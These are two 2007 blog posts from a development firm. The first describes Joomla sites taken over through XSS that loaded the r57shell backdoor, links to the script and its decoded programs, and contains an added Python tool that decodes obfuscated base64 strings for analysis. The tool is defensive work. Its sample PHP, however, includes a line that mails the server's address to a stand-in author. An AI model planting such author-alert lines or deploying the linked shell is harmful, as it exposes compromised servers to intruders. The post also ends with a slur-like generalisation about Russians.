Friday, June 29, 2007

Joomla, XSS and Obfuscated Code

Hello again,

Yesterday, our chief engineer Ben came across an interesting backdoor PHP script that a friend on IRC was talking about. He was studying the Joomla source, prior to implementation, and found that tons of Joomla sites had been owned with an XSS used to load the r57shell PHP script.

We've included a copy of the script here for educational purposes: http://www.projectskyline.com/phplist/r57shell.txt

Ben went and posted this information to the NYPHPlist to give fellow developers some insight into the tools crackers are using against us.

A member of the PHPList pointed out that the script has some backdoor, author-alerting features: http://seclists.org/fulldisclosure/2006/Sep/0083.html

Ben decided to base64_decode() the obfuscated variables and see what kinds of programs the shell script was building and executing.

The first section of code is the author alert, which provides the author with the IP of the owned machine.

Ben then went ahead and decoded the programs. A link to them is here:
http://www.projectskyline.com/phplist/test.php
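One way to do the decoding step described above without ever running the script, as an added example that is not code from this post or from Ben: it pulls base64 string literals out of PHP source, decodes them, and tags what each decoded blob contains. The sample PHP, its variable names and the indicator list are constructed assumptions, not taken from r57shell.

```python
import base64
import binascii
import re

def _b64(text):
    return base64.b64encode(text.encode()).decode()

# Constructed sample (not r57shell code): two encoded payload variables plus
# two ordinary strings that must not be reported. It is only ever read as text.
SAMPLE_PHP = "\n".join([
    "<?php",
    '$notify = "%s";' % _b64('mail("author@example.invalid", "host", $_SERVER["SERVER_ADDR"]);'),
    "$helper = '%s';" % _b64('#!/usr/bin/perl\nprint "constructed helper\\n";\n'),
    '$title = "Site admin";',
    '$token = "ABCDEFGHIJKLMNOPQ";',
    "eval(base64_decode($notify));",
    "?>",
])

# $name = "<16+ base64 characters>"; with either quote style.
STRING_ASSIGN = re.compile(r'''\$(\w+)\s*=\s*(["'])([A-Za-z0-9+/]{16,}={0,2})\2\s*;''')

# Assumed triage tags for decoded content; extend for your own review.
INDICATORS = {
    "mail-call": re.compile(r"\bmail\s*\("),
    "url": re.compile(r"https?://", re.I),
    "server-address": re.compile(r"SERVER_ADDR|REMOTE_ADDR|HTTP_HOST"),
    "script-shebang": re.compile(r"^#!", re.M),
    "c-source": re.compile(r"#include\s*<"),
}

def decode_literals(php_source):
    """Return {variable: decoded text} for literals that decode to readable text."""
    decoded = {}
    for match in STRING_ASSIGN.finditer(php_source):
        name, blob = match.group(1), match.group(3)
        try:
            raw = base64.b64decode(blob, validate=True)
        except (binascii.Error, ValueError):
            continue  # looked like base64 but is not (bad length or padding)
        readable = sum(32 <= b < 127 or b in (9, 10, 13) for b in raw)
        if readable / len(raw) >= 0.9:  # skip blobs that decode to binary noise
            decoded[name] = raw.decode("ascii", "replace")
    return decoded

def triage(php_source):
    """Map each decoded variable to the sorted indicator tags found in it."""
    return {name: sorted(tag for tag, rx in INDICATORS.items() if rx.search(text))
            for name, text in decode_literals(php_source).items()}
```
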

Can't trust those Russians!

- psl


Tuesday, February 27, 2007

TechTrax Article Debut

Hello all,

Our first TechTrax article has debuted! ProjectSkyLine's chief engineer Ben has written a great article, 'Automatically Generate Documentation for Source Code with HeaderDoc', which explains how to set up a mechanism for generating source code documentation for any project (PHP is the example).

The same technique debuted in the article is used here at PSL. Because of the size of our clients' projects, we need up-to-date, detailed and accurate project documentation.

In other news, we've landed a large job for a 'mash up' of types. A beta will be released in a few months, so stay tuned. Not much else can be announced...it's a skunk works project!

See you soon!

- psl
